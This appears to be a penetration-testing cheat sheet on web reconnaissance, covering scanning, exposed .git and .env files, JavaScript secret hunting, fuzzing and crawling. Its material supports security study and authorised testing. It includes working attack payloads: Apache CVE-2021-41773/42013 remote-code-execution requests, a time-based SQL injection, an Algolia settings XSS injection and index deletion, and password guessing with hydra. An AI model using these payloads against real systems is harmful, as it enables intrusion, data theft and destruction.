Web Enumeration
Recon, fuzzing and crawling
Recon
Also check for other exposed ports. Ex: 22 - look for regreSSHion (CVE-2024-6387), etc. See Protocols
nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list
Leverage Shodan to identify exposed services and known CVEs
EyeWitness or Aquatone - See Information Gathering
Fingerprinting / Crawling
SSL / TLS
HTTP/2 - DoS
Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487
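A quick preliminary check (placeholder host) is whether the server even negotiates HTTP/2; confirming Rapid Reset itself still needs a dedicated PoC:
curl -skI --http2 https://target.example -o /dev/null -w '%{http_version}\n'
# "2" => HTTP/2 is enabled and worth testing further; "1.1" => not affected by CVE-2023-44487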
HTTP Downgrading
HTTP downgrading is the process of forcing a request to be processed under HTTP/1.1 instead of HTTP/2.
Open Burp Suite and Navigate to Proxy → HTTP History
Locate the request that is currently using HTTP/2.
Send the Request to Repeater
In the Repeater tab, open the "Inspector" panel → Request Attributes → Protocol
Change HTTP Version to HTTP/1.1
Click "Send" in Repeater.
If successful, you should receive a valid response, confirming the server accepts HTTP/1.1.
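The same downgrade check can be sketched outside Burp with curl (placeholder host); a normal response confirms HTTP/1.1 is accepted:
curl -skI --http1.1 https://target.example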
Now, test for request smuggling
HTTP Request Smuggling
HTTP Methods
HTTP Verb Tampering
Apache Vulnerability Testing
CVE-2021-41773 (RCE and LFI)
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id
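A commonly used curl PoC for the same path traversal (target and port are placeholders; RCE requires mod_cgi, and the same traversal against a non-CGI directory such as /icons/ can be used for LFI instead):
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' 'http://TARGET:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'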
CVE-2021-42013 (RCE and LFI)
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id
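Equivalent curl sketch using the double URL-encoded traversal (placeholder target):
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' 'http://TARGET:8080/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh'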
Scan for creds
Header Exploit
Common files
.git
.gitkeep
.git-rewrite
.gitreview
.git/HEAD
.gitconfig
.git/index
.git/logs
.svnignore
.gitattributes
.gitmodules
.svn/entries
.DS_Store
.env
debug.log
backup/
admin.bak
database.sql
composer.lock
robots.txt
-> robofinder: search for and retrieve historical robots.txt files from Archive.org for any given website.
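A minimal ffuf sketch to probe the files above in bulk (common_files.txt is a hypothetical file containing the list):
ffuf -u https://target.example/FUZZ -w common_files.txt -mc 200,301,302,403 -c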
.git
.svn
.DS_Store
.env

# python ds_store_exp.py http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/JS/.DS_Store
[200] http://10.13.X.X/Images/.DS_Store
[200] http://10.13.X.X/dev/.DS_Store
<--SNIP-->
Cloudflare
Real IP address
Tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
Internal IP leakage
Check /cdn-cgi/trace on live hosts: it can leak internal IPs.
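For example (placeholder host):
curl -s https://target.example/cdn-cgi/trace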
sitemap.xml
Time-based SQL injection: sleep payload [1;SELECT IF((8303>8302),SLEEP(9),2356)#]
A response delayed by ~9 seconds indicates the injection fired.
target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#
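A rough timing check with curl (payload URL-encoded, placeholder host); compare against a baseline request without the payload:
time curl -s -o /dev/null 'https://target.example/sitemap.xml?offset=1;SELECT%20IF((8303>8302),SLEEP(9),2356)%23'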
Misconfigurations on popular third-party services

Git Exposed
DotGit Extension - Firefox and Chrome https://addons.mozilla.org/en-US/firefox/addon/dotgit/
cat domains.txt | nuclei -t gitExposed.yaml
Nuclei Template: https://github.com/coffinxp/priv8-Nuclei/blob/main/git-exposed.yaml
id: git-exposed

info:
  name: Exposed Git Repository
  author: kaks3c
  severity: medium
  description: |
    Checks for exposed Git repositories by making requests to potential Git repository paths.
  tags: p3,logs,git

http:
  - raw:
      - |
        GET {{BaseURL}}{{path}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Connection: close

    attack: pitchfork
    payloads:
      path:
        - /.git/
        - /.git/HEAD
        - /.git/config
        - /.git/logs/HEAD
        - /.git/logs/
        - /.git/description
        - /.git/refs/heads/
        - /.git/refs/remotes/
        - /.git/objects/

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "commit (initial): Initial commit" # /.git/logs/HEAD
          - "ref: refs/heads/" # /.git/HEAD
          - "logallrefupdates = true" # /.git/config
          - "repositoryformatversion = 0" # /.git/config
          - "Index of /" # /.git/
          - "You do not have permission to access /.git/" # 403 /.git
          - "Unnamed repository; edit this file 'description' to name the repository" # /.git/description

      - type: regex
        regex:
          - "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" # /.git/objects/
          - "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" # /.git/objects/
          - "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" # /.git/refs/heads/
          - "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" # /.git/refs/remotes/
          - "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" # /.git/logs/

    stop-at-first-match: true
.git found => download the target .git folder
wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/
Or with tools:
$ git clone https://github.com/deletescape/goop
$ cd goop
$ go build
$ ./goop http://dev.dumpme.htb
After that, search for creds, vulnerabilities, etc:
Credentials in git repos
GitHub - finding vulnerabilities
SVN Exposed
./svn-extractor.py --url http://url.com --match database.php
PHPMyAdmin
target[.]com/phpmyadmin/setup/index.php
==> 301 to login page
target[.]com/phpMyAdmin/setup/index.php
==> 200 to phpmyadmin setup
AdminDirectoryFinder
WSAAR
OWASP Noir

$ noir -b . -u http://example.com
$ noir -b . -u http://example.com --passive-scan
URLScan.io
Check URLScan as a complement to Wayback Machine
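The urlscan.io search API can also be queried directly; a quick sketch (domain is a placeholder, jq required):
curl -s 'https://urlscan.io/api/v1/search/?q=domain:target.com' | jq -r '.results[].page.url' | sort -u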
Information Gathering
WaybackLister
Reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings
python waybacklister.py -d target.com
Wayback Machine
# RECON METHOD BY ~/.COFFINXP
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
waymore -i target.com -mode U -oU urls.txt
Download pages and extract JS (mode R)
waymore -i target.com -mode R --output-inline-js -ko "\.js$" -oR jsdump/*
Backup Files
ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50 -fs 0 -c -x http://localip:8080
Fuzzuli
echo http://target.com | fuzzuli -p
Burp Extension
Archived Backups
Look for metadata
Extract URLs and paths from web pages
Manually
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Open the Console (Ctrl + Shift + I), type "allow pasting" if prompted, paste the JS code, then click the bookmark.


Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA
Gourlex
gourlex -t domain.com
xnLinkFinder
xnLinkfinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d2 -v
Command breakdown:
-i bugcrowd.com → Target domain
-sp https://www.bugcrowd.com → Scope prefix
-sf "bugcrowd.*" → Scope filter
-d2 → Crawl depth
-v → Verbose output
Related: https://github.com/mhmdiaa/chronos
Hakrawler
echo https://google.com | hakrawler
Waybackurls
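Typical usage (domain is a placeholder):
waybackurls target.com > wayback_urls.txt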
Katana & Urlfinder
katana -u https://tesla.com
urlfinder -d tesla.com
GetAllURL - gau
gau https://target.com
LinkFinder
python3 linkfinder.py -i https://example.com/app.js
$ python linkfinder.py -i 'js/*' -o result.html
$ python linkfinder.py -i 'js/*' -o cli
GoLinkFinder
Faster than LinkFinder
golinkfinder -file js_files.txt -output results.json
LazyEgg
ReconSpider
Secrets in Response
Detects sensitive information leaks in HTTP responses using custom regex-based signatures
Metadata
Metadata and Hidden infos
JS Files
Sensitive JS Files
ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10
/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
Burp

Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA


wget -i urls.txt
Detect secrets
./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all"
Burp Extension
Code Analysis
Code Analysis
semgrep scan --config auto

JSFScan.sh
1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.
9 - Generate Html Report.
bash JSFScan.sh -l target.txt --all -r -o outputdir
Morgan
Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites
Gouge - Burp extension to extract URLs which are seen in JS files
GetJS
JSHunter
Endpoint Extraction and Sensitive Data Detection
cat urls.txt | grep "\.js" | jshunter
Javascript Deobfuscator
Online
API Endpoint - Burp History

API Endpoint in JS File
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
JSNinja
JS Link Finder
Jsluice
API
Sensitive data in JS Files
Top 25 JavaScript path files used to store sensitive information
/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js

JS Miner - Burp Extension
X-Keys - Burp Extension
jsluice++ - Burp Extension

SecretFinder
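Typical SecretFinder usage (URL is a placeholder):
python3 SecretFinder.py -i https://example.com/app.js -o cli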
Mantra
Testing API Key
Google Maps API Key
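One quick validity check among many (see gmapsapiscanner for full coverage); the key is a placeholder, and an image response instead of an error means the key is usable for the Static Maps API:
curl -s "https://maps.googleapis.com/maps/api/staticmap?center=45,10&zoom=7&size=400x400&key=FOUND_KEY" -o map.png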
Algolia API Key
Check ACL:
https://APPID-dsn.algolia.net/1/keys/APIKEY?x-algolia-application-id=APPID&x-algolia-api-key=APIKEY
The most damaging permissions are:
addObject: Allows adding/updating an object in the index (copying/moving indices is also allowed with this permission).
deleteObject: Allows deleting an existing object.
deleteIndex: Allows deleting an index (will break search completely).
editSettings: Allows changing index settings; this can also be abused to run JavaScript when the search is used.
listIndexes: Allows listing all accessible indices.
logs: Allows viewing the search logs, which can include IP addresses and sensitive cookies.
Abuse editSettings to inject an XSS payload:
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
List indexes
curl -X GET \
"https://{appID}-dsn.algolia.net/1/indexes/" \
-H "X-Algolia-API-Key: {api-key}" \
-H "X-Algolia-Application-Id: {appID}"
Retrieve/read the data of a resource from the server:
settings
curl --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header 'content-type: application/json' --header 'x-algolia-api-key: <example-key>' --header 'x-algolia-application-id: <example-application-id>'
Specific index
curl -X GET \
"https://{appID}-dsn.algolia.net/1/indexes/{index_name}" \
-H "X-Algolia-API-Key: {apikey}" \
-H "X-Algolia-Application-Id: {appID}"
Update a resource on the server.
curl -X PATCH --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header 'content-type: application/json' --header 'x-algolia-api-key: <example-key>' --header 'x-algolia-application-id: <example-application-id>' --data '{"highlightPreTag": "This is hacked"}'
Delete Index - DON'T DO THIS ON PRODUCTION ENVIRONMENT
curl -X DELETE \
"https://{appID}-dsn.algolia.net/1/indexes/Index_name?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}"
Hidden Parameter
This useful option in Burp Suite makes every hidden input field (often with a reference to a hidden parameter) visible
Proxy Settings >>> Response modification rules >>> Unhide hidden form fields

Parameters fuzzing
Burp - Param Miner
Right-click → Extensions → Param Miner → Guess params → Guess GET parameters.



Burp - GAP
GetAllParams
x8
Hidden parameters discovery
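Example x8 run (wordlist path is a placeholder):
x8 -u "https://target.example/" -w params.txt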
Arjun
$ python3 /opt/Arjun/arjun.py -u http://target_address.com
$ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json
If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list to a text file. Then run Arjun against all Burp Suite targets simultaneously, like this:
$ python3 /opt/Arjun/arjun.py -i burp_targets.txt
Parmahunter
Wordlists
Try /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt first, then https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt
dirb lists
Common extensions:
raft-[ small | medium | large ]-extensions.txt
from SecLists Web-Content
Create wordlist - CeWL
cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10
Fuzz using different HTTP methods
ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD
Admin interfaces
Backups
Config files
SQL files
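A minimal ffuf sketch for the categories above, appending backup/config/SQL extensions (wordlist and extension set are just examples):
ffuf -u https://target.example/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -e .bak,.old,.zip,.tar.gz,.sql,.conf -mc 200,301,403 -c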
Vulnerability Assessment
Vulnerability Scanners
Port Scan
sudo nmap 10.129.2.28 -p 80 -sV --script vuln
Nmap scan report for 10.129.2.28
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.3.4
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
Lostfuzzer
Admin interface
Password lists
CMS
Crawling
Crawl with 2 separate user-agents
Always crawl with 2 separate User-Agent headers, one for desktop and one for mobile devices, and look for response changes!
gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt
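A desktop counterpart to the mobile crawl above (UA string and output name are just examples); diff the two outputs to spot response differences:
gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" -o desktop_endpoints.txt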

Gospider
Hakrawler
With Burp
With Zap
sudo snap install zaproxy --classic
Spidering

Fuzzing

Fuzz
Fuzzing
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS
Admin interface => Password guessing
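If an admin login form is found, a hydra sketch for password guessing (path, parameter names and failure string are placeholders):
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/admin/login.php:username=^USER^&password=^PASS^:Invalid credentials"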
Banner grabbing
curl -IL https://www.inlanefreight.com
Tool: https://github.com/FortyNorthSecurity/EyeWitness ; or Aquatone
Information Gathering
whatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24
DNS Subdomain Enumeration
DNS Subdomain Enumeration
Cloudflare Bypass for Web Scraping
Interesting Books
Interesting Books
The Web Application Hacker’s Handbook - The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities - Learn how to perform reconnaissance on a target, identify vulnerabilities, and exploit them.
Real-World Bug Hunting: A Field Guide to Web Hacking - Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.